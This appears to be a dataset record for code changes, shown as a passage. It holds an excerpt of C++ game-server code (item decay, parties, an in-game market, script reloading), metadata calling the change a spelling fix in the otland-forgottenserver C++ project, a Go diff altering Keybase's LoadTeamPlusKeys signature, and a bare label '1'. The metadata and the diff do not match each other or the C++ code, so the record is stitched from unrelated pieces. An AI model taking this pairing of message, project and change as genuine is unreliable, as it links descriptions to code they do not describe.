item->getDecaying(); if (decayState == DECAYING_TRUE) { return; } if (item->getDuration() > 0) { item->incrementReferenceCounter(); item->setDecaying(DECAYING_TRUE); toDecayItems.push_front(item); } else { internalDecayItem(item); } } void Game::internalDecayItem(Item* item) { const ItemType& it = Item::items[item->getID()]; if (it.decayTo != 0) { Item* newItem = transformItem(item, item->getDecayTo()); startDecay(newItem); } else { ReturnValue ret = internalRemoveItem(item); if (ret != RETURNVALUE_NOERROR) { std::cout << "[Debug - Game::internalDecayItem] internalDecayItem failed, error code: " << static_cast<uint32_t>(ret) << ", item id: " << item->getID() << std::endl; } } } void Game::checkDecay() { g_scheduler.addEvent(createSchedulerTask(EVENT_DECAYINTERVAL, std::bind(&Game::checkDecay, this))); size_t bucket = (lastBucket + 1) % EVENT_DECAY_BUCKETS; auto it = decayItems[bucket].begin(), end = decayItems[bucket].end(); while (it != end) { Item* item = *it; if (!item->canDecay()) { item->setDecaying(DECAYING_FALSE); ReleaseItem(item); it = decayItems[bucket].erase(it); continue; } int32_t duration = item->getDuration(); int32_t decreaseTime = std::min<int32_t>(EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS, duration); duration -= decreaseTime; item->decreaseDuration(decreaseTime); if (duration <= 0) { it = decayItems[bucket].erase(it); internalDecayItem(item); ReleaseItem(item); } else if (duration < EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS) { it = decayItems[bucket].erase(it); size_t newBucket = (bucket + ((duration + EVENT_DECAYINTERVAL / 2) / 1000)) % EVENT_DECAY_BUCKETS; if (newBucket == bucket) { internalDecayItem(item); ReleaseItem(item); } else { decayItems[newBucket].push_back(item); } } else { ++it; } } lastBucket = bucket; cleanup(); } void Game::checkLight() { g_scheduler.addEvent(createSchedulerTask(EVENT_LIGHTINTERVAL, std::bind(&Game::checkLight, this))); updateWorldLightLevel(); LightInfo lightInfo = getWorldLightInfo(); for (const auto& it : players) { it.second->sendWorldLight(lightInfo); } } void Game::updateWorldLightLevel() { if (getWorldTime() >= GAME_SUNRISE && getWorldTime() <= GAME_DAYTIME) { lightLevel = ((GAME_DAYTIME - GAME_SUNRISE) - (GAME_DAYTIME - getWorldTime())) * float(LIGHT_CHANGE_SUNRISE) + LIGHT_NIGHT; } else if (getWorldTime() >= GAME_SUNSET && getWorldTime() <= GAME_NIGHTTIME) { lightLevel = LIGHT_DAY - ((getWorldTime() - GAME_SUNSET) * float(LIGHT_CHANGE_SUNSET)); } else if (getWorldTime() >= GAME_NIGHTTIME || getWorldTime() < GAME_SUNRISE) { lightLevel = LIGHT_NIGHT; } else { lightLevel = LIGHT_DAY; } } void Game::updateWorldTime() { g_scheduler.addEvent(createSchedulerTask(EVENT_WORLDTIMEINTERVAL, std::bind(&Game::updateWorldTime, this))); time_t osTime = time(nullptr); tm* timeInfo = localtime(&osTime); worldTime = (timeInfo->tm_sec + (timeInfo->tm_min * 60)) / 2.5f; } void Game::shutdown() { std::cout << "Shutting down..." << std::flush; g_scheduler.shutdown(); g_databaseTasks.shutdown(); g_dispatcher.shutdown(); map.spawns.clear(); raids.clear(); cleanup(); if (serviceManager) { serviceManager->stop(); } ConnectionManager::getInstance().closeAll(); std::cout << " done!" 
<< std::endl; } void Game::cleanup() { //free memory for (auto creature : ToReleaseCreatures) { creature->decrementReferenceCounter(); } ToReleaseCreatures.clear(); for (auto item : ToReleaseItems) { item->decrementReferenceCounter(); } ToReleaseItems.clear(); for (Item* item : toDecayItems) { const uint32_t dur = item->getDuration(); if (dur >= EVENT_DECAYINTERVAL * EVENT_DECAY_BUCKETS) { decayItems[lastBucket].push_back(item); } else { decayItems[(lastBucket + 1 + dur / 1000) % EVENT_DECAY_BUCKETS].push_back(item); } } toDecayItems.clear(); } void Game::ReleaseCreature(Creature* creature) { ToReleaseCreatures.push_back(creature); } void Game::ReleaseItem(Item* item) { ToReleaseItems.push_back(item); } void Game::broadcastMessage(const std::string& text, MessageClasses type) const { std::cout << "> Broadcasted message: \"" << text << "\"." << std::endl; for (const auto& it : players) { it.second->sendTextMessage(type, text); } } void Game::updateCreatureWalkthrough(const Creature* creature) { //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { Player* tmpPlayer = spectator->getPlayer(); tmpPlayer->sendCreatureWalkthrough(creature, tmpPlayer->canWalkthroughEx(creature)); } } void Game::updateCreatureSkull(const Creature* creature) { if (getWorldType() != WORLD_TYPE_PVP) { return; } SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureSkull(creature); } } void Game::updatePlayerShield(Player* player) { SpectatorVec spectators; map.getSpectators(spectators, player->getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureShield(player); } } void Game::updatePlayerHelpers(const Player& player) { uint32_t creatureId = player.getID(); uint16_t helpers = player.getHelpers(); SpectatorVec spectators; map.getSpectators(spectators, player.getPosition(), true, true); for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureHelpers(creatureId, helpers); } } void Game::updateCreatureType(Creature* creature) { const Player* masterPlayer = nullptr; uint32_t creatureId = creature->getID(); CreatureType_t creatureType = creature->getType(); if (creatureType == CREATURETYPE_MONSTER) { const Creature* master = creature->getMaster(); if (master) { masterPlayer = master->getPlayer(); if (masterPlayer) { creatureType = CREATURETYPE_SUMMON_OTHERS; } } } //send to clients SpectatorVec spectators; map.getSpectators(spectators, creature->getPosition(), true, true); if (creatureType == CREATURETYPE_SUMMON_OTHERS) { for (Creature* spectator : spectators) { Player* player = spectator->getPlayer(); if (masterPlayer == player) { player->sendCreatureType(creatureId, CREATURETYPE_SUMMON_OWN); } else { player->sendCreatureType(creatureId, creatureType); } } } else { for (Creature* spectator : spectators) { spectator->getPlayer()->sendCreatureType(creatureId, creatureType); } } } void Game::loadMotdNum() { Database& db = Database::getInstance(); DBResult_ptr result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'motd_num'"); if (result) { motdNum = result->getNumber<uint32_t>("value"); } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('motd_num', '0')"); } result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'motd_hash'"); if (result) { motdHash = 
result->getString("value"); if (motdHash != transformToSHA1(g_config.getString(ConfigManager::MOTD))) { ++motdNum; } } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('motd_hash', '')"); } } void Game::saveMotdNum() const { Database& db = Database::getInstance(); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:d}' WHERE `config` = 'motd_num'", motdNum)); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:s}' WHERE `config` = 'motd_hash'", transformToSHA1(g_config.getString(ConfigManager::MOTD)))); } void Game::checkPlayersRecord() { const size_t playersOnline = getPlayersOnline(); if (playersOnline > playersRecord) { uint32_t previousRecord = playersRecord; playersRecord = playersOnline; for (auto& it : g_globalEvents->getEventMap(GLOBALEVENT_RECORD)) { it.second.executeRecord(playersRecord, previousRecord); } updatePlayersRecord(); } } void Game::updatePlayersRecord() const { Database& db = Database::getInstance(); db.executeQuery(fmt::format("UPDATE `server_config` SET `value` = '{:d}' WHERE `config` = 'players_record'", playersRecord)); } void Game::loadPlayersRecord() { Database& db = Database::getInstance(); DBResult_ptr result = db.storeQuery("SELECT `value` FROM `server_config` WHERE `config` = 'players_record'"); if (result) { playersRecord = result->getNumber<uint32_t>("value"); } else { db.executeQuery("INSERT INTO `server_config` (`config`, `value`) VALUES ('players_record', '0')"); } } void Game::playerInviteToParty(uint32_t playerId, uint32_t invitedId) { if (playerId == invitedId) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } Player* invitedPlayer = getPlayerByID(invitedId); if (!invitedPlayer || invitedPlayer->isInviting(player)) { return; } if (invitedPlayer->getParty()) { player->sendTextMessage(MESSAGE_INFO_DESCR, fmt::format("{:s} is already in a party.", invitedPlayer->getName())); return; } Party* party = player->getParty(); if (!party) { party = new Party(player); } else if (party->getLeader() != player) { return; } party->invitePlayer(*invitedPlayer); } void Game::playerJoinParty(uint32_t playerId, uint32_t leaderId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* leader = getPlayerByID(leaderId); if (!leader || !leader->isInviting(player)) { return; } Party* party = leader->getParty(); if (!party || party->getLeader() != leader) { return; } if (player->getParty()) { player->sendTextMessage(MESSAGE_INFO_DESCR, "You are already in a party."); return; } party->joinParty(*player); } void Game::playerRevokePartyInvitation(uint32_t playerId, uint32_t invitedId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || party->getLeader() != player) { return; } Player* invitedPlayer = getPlayerByID(invitedId); if (!invitedPlayer || !player->isInviting(invitedPlayer)) { return; } party->revokeInvitation(*invitedPlayer); } void Game::playerPassPartyLeadership(uint32_t playerId, uint32_t newLeaderId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || party->getLeader() != player) { return; } Player* newLeader = getPlayerByID(newLeaderId); if (!newLeader || !player->isPartner(newLeader)) { return; } party->passPartyLeadership(newLeader); } void Game::playerLeaveParty(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || 
player->hasCondition(CONDITION_INFIGHT)) { return; } party->leaveParty(player); } void Game::playerEnableSharedPartyExperience(uint32_t playerId, bool sharedExpActive) { Player* player = getPlayerByID(playerId); if (!player) { return; } Party* party = player->getParty(); if (!party || (player->hasCondition(CONDITION_INFIGHT) && player->getZone() != ZONE_PROTECTION)) { return; } party->setSharedExperience(player, sharedExpActive); } void Game::sendGuildMotd(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Guild* guild = player->getGuild(); if (guild) { player->sendChannelMessage("Message of the Day", guild->getMotd(), TALKTYPE_CHANNEL_R1, CHANNEL_GUILD); } } void Game::kickPlayer(uint32_t playerId, bool displayEffect) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->kickPlayer(displayEffect); } void Game::playerReportRuleViolation(uint32_t playerId, const std::string& targetName, uint8_t reportType, uint8_t reportReason, const std::string& comment, const std::string& translation) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_events->eventPlayerOnReportRuleViolation(player, targetName, reportType, reportReason, comment, translation); } void Game::playerReportBug(uint32_t playerId, const std::string& message, const Position& position, uint8_t category) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_events->eventPlayerOnReportBug(player, message, position, category); } void Game::playerDebugAssert(uint32_t playerId, const std::string& assertLine, const std::string& date, const std::string& description, const std::string& comment) { Player* player = getPlayerByID(playerId); if (!player) { return; } // TODO: move debug assertions to database FILE* file = fopen("client_assertions.txt", "a"); if (file) { fprintf(file, "----- %s - %s (%s) -----\n", formatDate(time(nullptr)).c_str(), player->getName().c_str(), convertIPToString(player->getIP()).c_str()); fprintf(file, "%s\n%s\n%s\n%s\n", assertLine.c_str(), date.c_str(), description.c_str(), comment.c_str()); fclose(file); } } void Game::playerLeaveMarket(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->setInMarket(false); } void Game::playerBrowseMarket(uint32_t playerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); if (it.id == 0) { return; } if (it.wareId == 0) { return; } const MarketOfferList& buyOffers = IOMarket::getActiveOffers(MARKETACTION_BUY, it.id); const MarketOfferList& sellOffers = IOMarket::getActiveOffers(MARKETACTION_SELL, it.id); player->sendMarketBrowseItem(it.id, buyOffers, sellOffers); player->sendMarketDetail(it.id); } void Game::playerBrowseMarketOwnOffers(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const MarketOfferList& buyOffers = IOMarket::getOwnOffers(MARKETACTION_BUY, player->getGUID()); const MarketOfferList& sellOffers = IOMarket::getOwnOffers(MARKETACTION_SELL, player->getGUID()); player->sendMarketBrowseOwnOffers(buyOffers, sellOffers); } void Game::playerBrowseMarketOwnHistory(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } const HistoryMarketOfferList& buyOffers = IOMarket::getOwnHistory(MARKETACTION_BUY, player->getGUID()); const 
HistoryMarketOfferList& sellOffers = IOMarket::getOwnHistory(MARKETACTION_SELL, player->getGUID()); player->sendMarketBrowseOwnHistory(buyOffers, sellOffers); } void Game::playerCreateMarketOffer(uint32_t playerId, uint8_t type, uint16_t spriteId, uint16_t amount, uint32_t price, bool anonymous) { if (amount == 0 || amount > 64000) { return; } if (price == 0 || price > 999999999) { return; } if (type != MARKETACTION_BUY && type != MARKETACTION_SELL) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } if (g_config.getBoolean(ConfigManager::MARKET_PREMIUM) && !player->isPremium()) { player->sendMarketLeave(); return; } const ItemType& itt = Item::items.getItemIdByClientId(spriteId); if (itt.id == 0 || itt.wareId == 0) { return; } const ItemType& it = Item::items.getItemIdByClientId(itt.wareId); if (it.id == 0 || it.wareId == 0) { return; } if (!it.stackable && amount > 2000) { return; } const uint32_t maxOfferCount = g_config.getNumber(ConfigManager::MAX_MARKET_OFFERS_AT_A_TIME_PER_PLAYER); if (maxOfferCount != 0 && IOMarket::getPlayerOfferCount(player->getGUID()) >= maxOfferCount) { return; } uint64_t fee = (price / 100.) * amount; if (fee < 20) { fee = 20; } else if (fee > 1000) { fee = 1000; } if (type == MARKETACTION_SELL) { if (fee > (player->getMoney() + player->bankBalance)) { return; } DepotChest* depotChest = player->getDepotChest(player->getLastDepotId(), false); if (!depotChest) { return; } std::forward_list<Item*> itemList = getMarketItemList(it.wareId, amount, depotChest, player->getInbox()); if (itemList.empty()) { return; } if (it.stackable) { uint16_t tmpAmount = amount; for (Item* item : itemList) { uint16_t removeCount = std::min<uint16_t>(tmpAmount, item->getItemCount()); tmpAmount -= removeCount; internalRemoveItem(item, removeCount); if (tmpAmount == 0) { break; } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } const auto debitCash = std::min(player->getMoney(), fee); const auto debitBank = fee - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; } else { uint64_t totalPrice = static_cast<uint64_t>(price) * amount; totalPrice += fee; if (totalPrice > (player->getMoney() + player->bankBalance)) { return; } const auto debitCash = std::min(player->getMoney(), totalPrice); const auto debitBank = totalPrice - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; } IOMarket::createOffer(player->getGUID(), static_cast<MarketAction_t>(type), it.id, amount, price, anonymous); player->sendMarketEnter(player->getLastDepotId()); const MarketOfferList& buyOffers = IOMarket::getActiveOffers(MARKETACTION_BUY, it.id); const MarketOfferList& sellOffers = IOMarket::getActiveOffers(MARKETACTION_SELL, it.id); player->sendMarketBrowseItem(it.id, buyOffers, sellOffers); } void Game::playerCancelMarketOffer(uint32_t playerId, uint32_t timestamp, uint16_t counter) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } MarketOfferEx offer = IOMarket::getOfferByCounter(timestamp, counter); if (offer.id == 0 || offer.playerId != player->getGUID()) { return; } if (offer.type == MARKETACTION_BUY) { player->bankBalance += static_cast<uint64_t>(offer.price) * offer.amount; player->sendMarketEnter(player->getLastDepotId()); } else { const ItemType& it = Item::items[offer.itemId]; if (it.id == 0) { return; } if (it.stackable) { uint16_t tmpAmount = offer.amount; while (tmpAmount > 0) { int32_t stackCount = 
std::min<int32_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, stackCount); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < offer.amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } } IOMarket::moveOfferToHistory(offer.id, OFFERSTATE_CANCELLED); offer.amount = 0; offer.timestamp += g_config.getNumber(ConfigManager::MARKET_OFFER_DURATION); player->sendMarketCancelOffer(offer); player->sendMarketEnter(player->getLastDepotId()); } void Game::playerAcceptMarketOffer(uint32_t playerId, uint32_t timestamp, uint16_t counter, uint16_t amount) { if (amount == 0 || amount > 64000) { return; } Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->isInMarket()) { return; } MarketOfferEx offer = IOMarket::getOfferByCounter(timestamp, counter); if (offer.id == 0) { return; } uint32_t offerAccountId = IOLoginData::getAccountIdByPlayerId(offer.playerId); if (offerAccountId == player->getAccount()) { return; } if (amount > offer.amount) { return; } const ItemType& it = Item::items[offer.itemId]; if (it.id == 0) { return; } uint64_t totalPrice = static_cast<uint64_t>(offer.price) * amount; if (offer.type == MARKETACTION_BUY) { DepotChest* depotChest = player->getDepotChest(player->getLastDepotId(), false); if (!depotChest) { return; } std::forward_list<Item*> itemList = getMarketItemList(it.wareId, amount, depotChest, player->getInbox()); if (itemList.empty()) { return; } Player* buyerPlayer = getPlayerByGUID(offer.playerId); if (!buyerPlayer) { buyerPlayer = new Player(nullptr); if (!IOLoginData::loadPlayerById(buyerPlayer, offer.playerId)) { delete buyerPlayer; return; } } if (it.stackable) { uint16_t tmpAmount = amount; for (Item* item : itemList) { uint16_t removeCount = std::min<uint16_t>(tmpAmount, item->getItemCount()); tmpAmount -= removeCount; internalRemoveItem(item, removeCount); if (tmpAmount == 0) { break; } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } player->bankBalance += totalPrice; if (it.stackable) { uint16_t tmpAmount = amount; while (tmpAmount > 0) { uint16_t stackCount = std::min<uint16_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, stackCount); if (internalAddItem(buyerPlayer->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(buyerPlayer->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } if (buyerPlayer->isOffline()) { IOLoginData::savePlayer(buyerPlayer); delete buyerPlayer; } else { buyerPlayer->onReceiveMail(); } } else { if (totalPrice > (player->getMoney() + player->bankBalance)) { return; } const auto debitCash = std::min(player->getMoney(), totalPrice); const auto debitBank = totalPrice - debitCash; removeMoney(player, debitCash); player->bankBalance -= debitBank; if (it.stackable) { uint16_t tmpAmount = amount; while (tmpAmount > 0) { uint16_t stackCount = std::min<uint16_t>(100, tmpAmount); Item* item = Item::CreateItem(it.id, 
stackCount); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } tmpAmount -= stackCount; } } else { int32_t subType; if (it.charges != 0) { subType = it.charges; } else { subType = -1; } for (uint16_t i = 0; i < amount; ++i) { Item* item = Item::CreateItem(it.id, subType); if (internalAddItem(player->getInbox(), item, INDEX_WHEREEVER, FLAG_NOLIMIT) != RETURNVALUE_NOERROR) { delete item; break; } } } Player* sellerPlayer = getPlayerByGUID(offer.playerId); if (sellerPlayer) { sellerPlayer->bankBalance += totalPrice; } else { IOLoginData::increaseBankBalance(offer.playerId, totalPrice); } player->onReceiveMail(); } const int32_t marketOfferDuration = g_config.getNumber(ConfigManager::MARKET_OFFER_DURATION); IOMarket::appendHistory(player->getGUID(), (offer.type == MARKETACTION_BUY ? MARKETACTION_SELL : MARKETACTION_BUY), offer.itemId, amount, offer.price, offer.timestamp + marketOfferDuration, OFFERSTATE_ACCEPTEDEX); IOMarket::appendHistory(offer.playerId, offer.type, offer.itemId, amount, offer.price, offer.timestamp + marketOfferDuration, OFFERSTATE_ACCEPTED); offer.amount -= amount; if (offer.amount == 0) { IOMarket::deleteOffer(offer.id); } else { IOMarket::acceptOffer(offer.id, amount); } player->sendMarketEnter(player->getLastDepotId()); offer.timestamp += marketOfferDuration; player->sendMarketAcceptOffer(offer); } void Game::parsePlayerExtendedOpcode(uint32_t playerId, uint8_t opcode, const std::string& buffer) { Player* player = getPlayerByID(playerId); if (!player) { return; } for (CreatureEvent* creatureEvent : player->getCreatureEvents(CREATURE_EVENT_EXTENDED_OPCODE)) { creatureEvent->executeExtendedOpcode(player, opcode, buffer); } } std::forward_list<Item*> Game::getMarketItemList(uint16_t wareId, uint16_t sufficientCount, DepotChest* depotChest, Inbox* inbox) { std::forward_list<Item*> itemList; uint16_t count = 0; std::list<Container*> containers { depotChest, inbox }; do { Container* container = containers.front(); containers.pop_front(); for (Item* item : container->getItemList()) { Container* c = item->getContainer(); if (c && !c->empty()) { containers.push_back(c); continue; } const ItemType& itemType = Item::items[item->getID()]; if (itemType.wareId != wareId) { continue; } if (c && (!itemType.isContainer() || c->capacity() != itemType.maxItems)) { continue; } if (!item->hasMarketAttributes()) { continue; } itemList.push_front(item); count += Item::countByType(item, -1); if (count >= sufficientCount) { return itemList; } } } while (!containers.empty()); return std::forward_list<Item*>(); } void Game::forceAddCondition(uint32_t creatureId, Condition* condition) { Creature* creature = getCreatureByID(creatureId); if (!creature) { delete condition; return; } creature->addCondition(condition, true); } void Game::forceRemoveCondition(uint32_t creatureId, ConditionType_t type) { Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } creature->removeCondition(type, true); } void Game::sendOfflineTrainingDialog(Player* player) { if (!player) { return; } if (!player->hasModalWindowOpen(offlineTrainingWindow.id)) { player->sendModalWindow(offlineTrainingWindow); } } void Game::playerAnswerModalWindow(uint32_t playerId, uint32_t modalWindowId, uint8_t button, uint8_t choice) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!player->hasModalWindowOpen(modalWindowId)) { return; } player->onModalWindowHandled(modalWindowId); // offline training, hard-coded if 
(modalWindowId == std::numeric_limits<uint32_t>::max()) { if (button == offlineTrainingWindow.defaultEnterButton) { if (choice == SKILL_SWORD || choice == SKILL_AXE || choice == SKILL_CLUB || choice == SKILL_DISTANCE || choice == SKILL_MAGLEVEL) { BedItem* bedItem = player->getBedItem(); if (bedItem && bedItem->sleep(player)) { player->setOfflineTrainingSkill(choice); return; } } } else { player->sendTextMessage(MESSAGE_EVENT_ADVANCE, "Offline training aborted."); } player->setBedItem(nullptr); } else { for (auto creatureEvent : player->getCreatureEvents(CREATURE_EVENT_MODALWINDOW)) { creatureEvent->executeModalWindow(player, modalWindowId, button, choice); } } } void Game::addPlayer(Player* player) { const std::string& lowercase_name = asLowerCaseString(player->getName()); mappedPlayerNames[lowercase_name] = player; mappedPlayerGuids[player->getGUID()] = player; wildcardTree.insert(lowercase_name); players[player->getID()] = player; } void Game::removePlayer(Player* player) { const std::string& lowercase_name = asLowerCaseString(player->getName()); mappedPlayerNames.erase(lowercase_name); mappedPlayerGuids.erase(player->getGUID()); wildcardTree.remove(lowercase_name); players.erase(player->getID()); } void Game::addNpc(Npc* npc) { npcs[npc->getID()] = npc; } void Game::removeNpc(Npc* npc) { npcs.erase(npc->getID()); } void Game::addMonster(Monster* monster) { monsters[monster->getID()] = monster; } void Game::removeMonster(Monster* monster) { monsters.erase(monster->getID()); } Guild* Game::getGuild(uint32_t id) const { auto it = guilds.find(id); if (it == guilds.end()) { return nullptr; } return it->second; } void Game::addGuild(Guild* guild) { guilds[guild->getId()] = guild; } void Game::removeGuild(uint32_t guildId) { guilds.erase(guildId); } void Game::decreaseBrowseFieldRef(const Position& pos) { Tile* tile = map.getTile(pos.x, pos.y, pos.z); if (!tile) { return; } auto it = browseFields.find(tile); if (it != browseFields.end()) { it->second->decrementReferenceCounter(); } } void Game::internalRemoveItems(std::vector<Item*> itemList, uint32_t amount, bool stackable) { if (stackable) { for (Item* item : itemList) { if (item->getItemCount() > amount) { internalRemoveItem(item, amount); break; } else { amount -= item->getItemCount(); internalRemoveItem(item); } } } else { for (Item* item : itemList) { internalRemoveItem(item); } } } BedItem* Game::getBedBySleeper(uint32_t guid) const { auto it = bedSleepersMap.find(guid); if (it == bedSleepersMap.end()) { return nullptr; } return it->second; } void Game::setBedSleeper(BedItem* bed, uint32_t guid) { bedSleepersMap[guid] = bed; } void Game::removeBedSleeper(uint32_t guid) { auto it = bedSleepersMap.find(guid); if (it != bedSleepersMap.end()) { bedSleepersMap.erase(it); } } Item* Game::getUniqueItem(uint16_t uniqueId) { auto it = uniqueItems.find(uniqueId); if (it == uniqueItems.end()) { return nullptr; } return it->second; } bool Game::addUniqueItem(uint16_t uniqueId, Item* item) { auto result = uniqueItems.emplace(uniqueId, item); if (!result.second) { std::cout << "Duplicate unique id: " << uniqueId << std::endl; } return result.second; } void Game::removeUniqueItem(uint16_t uniqueId) { auto it = uniqueItems.find(uniqueId); if (it != uniqueItems.end()) { uniqueItems.erase(it); } } bool Game::reload(ReloadTypes_t reloadType) { switch (reloadType) { case RELOAD_TYPE_ACTIONS: return g_actions->reload(); case RELOAD_TYPE_CHAT: return g_chat->load(); case RELOAD_TYPE_CONFIG: return g_config.reload(); case RELOAD_TYPE_CREATURESCRIPTS: { 
g_creatureEvents->reload(); g_creatureEvents->removeInvalidEvents(); return true; } case RELOAD_TYPE_EVENTS: return g_events->load(); case RELOAD_TYPE_GLOBALEVENTS: return g_globalEvents->reload(); case RELOAD_TYPE_ITEMS: return Item::items.reload(); case RELOAD_TYPE_MONSTERS: return g_monsters.reload(); case RELOAD_TYPE_MOUNTS: return mounts.reload(); case RELOAD_TYPE_MOVEMENTS: return g_moveEvents->reload(); case RELOAD_TYPE_NPCS: { Npcs::reload(); return true; } case RELOAD_TYPE_QUESTS: return quests.reload(); case RELOAD_TYPE_RAIDS: return raids.reload() && raids.startup(); case RELOAD_TYPE_SPELLS: { if (!g_spells->reload()) { std::cout << "[Error - Game::reload] Failed to reload spells." << std::endl; std::terminate(); } else if (!g_monsters.reload()) { std::cout << "[Error - Game::reload] Failed to reload monsters." << std::endl; std::terminate(); } return true; } case RELOAD_TYPE_TALKACTIONS: return g_talkActions->reload(); case RELOAD_TYPE_WEAPONS: { bool results = g_weapons->reload(); g_weapons->loadDefaults(); return results; } case RELOAD_TYPE_SCRIPTS: { // commented out stuff is TODO, once we approach further in revscriptsys g_actions->clear(true); g_creatureEvents->clear(true); g_moveEvents->clear(true); g_talkActions->clear(true); g_globalEvents->clear(true); g_weapons->clear(true); g_weapons->loadDefaults(); g_spells->clear(true); g_scripts->loadScripts("scripts", false, true); g_creatureEvents->removeInvalidEvents(); /* Npcs::reload(); raids.reload() && raids.startup(); Item::items.reload(); quests.reload(); mounts.reload(); g_config.reload(); g_events->load(); g_chat->load(); */ return true; } default: { if (!g_spells->reload()) { std::cout << "[Error - Game::reload] Failed to reload spells." << std::endl; std::terminate(); } else if (!g_monsters.reload()) { std::cout << "[Error - Game::reload] Failed to reload monsters." << std::endl; std::terminate(); } g_actions->reload(); g_config.reload(); g_creatureEvents->reload(); g_monsters.reload(); g_moveEvents->reload(); Npcs::reload(); raids.reload() && raids.startup(); g_talkActions->reload(); Item::items.reload(); g_weapons->reload(); g_weapons->clear(true); g_weapons->loadDefaults(); quests.reload(); mounts.reload(); g_globalEvents->reload(); g_events->load(); g_chat->load(); g_actions->clear(true); g_creatureEvents->clear(true); g_moveEvents->clear(true); g_talkActions->clear(true); g_globalEvents->clear(true); g_spells->clear(true); g_scripts->loadScripts("scripts", false, true); g_creatureEvents->removeInvalidEvents(); return true; } } return true; }
idx: 1
id: 19,649
msg: spelling (variable name, all three changes)
proj: otland-forgottenserver
lang: cpp
@@ -411,8 +411,16 @@ type KeybaseService interface { []keybase1.PublicKey, error) // LoadTeamPlusKeys returns a TeamInfo struct for a team with the - // specified TeamID. - LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID) (TeamInfo, error) + // specified TeamID. The caller can specify `desiredKeyGen` to + // force a server check if that particular key gen isn't yet + // known; it may be set to UnspecifiedKeyGen if no server check is + // required. The caller can specify `desiredUID` to force a + // server check if that particular UID isn't a member of the team + // yet according to local caches; it may be set to "" if no server + // check is required. + LoadTeamPlusKeys(ctx context.Context, tid keybase1.TeamID, + desiredKeyGen KeyGen, desiredUser keybase1.UserVersion, + desiredRole keybase1.TeamRole) (TeamInfo, error) // CurrentSession returns a SessionInfo struct with all the // information for the current session, or an error otherwise.
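For context on the signature change in the patch above, a minimal, hypothetical caller sketch in Go follows. The helper name loadTeamInfoFromCache is invented for illustration, and the specific "no check requested" values for the user version and role are assumptions; UnspecifiedKeyGen is the sentinel named in the diff's own doc comment for skipping the key-generation server check, and TeamRole_NONE is taken from the keybase1 protocol rather than from this patch.

package libkbfs

import (
	"github.com/keybase/client/go/protocol/keybase1"
	"golang.org/x/net/context"
)

// loadTeamInfoFromCache illustrates calling the new LoadTeamPlusKeys
// signature. Passing UnspecifiedKeyGen, an empty UserVersion, and
// TeamRole_NONE requests no forced server check, so the lookup may be
// served entirely from local caches.
func loadTeamInfoFromCache(ctx context.Context, service KeybaseService,
	tid keybase1.TeamID) (TeamInfo, error) {
	return service.LoadTeamPlusKeys(ctx, tid,
		UnspecifiedKeyGen, keybase1.UserVersion{}, keybase1.TeamRole_NONE)
}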
1
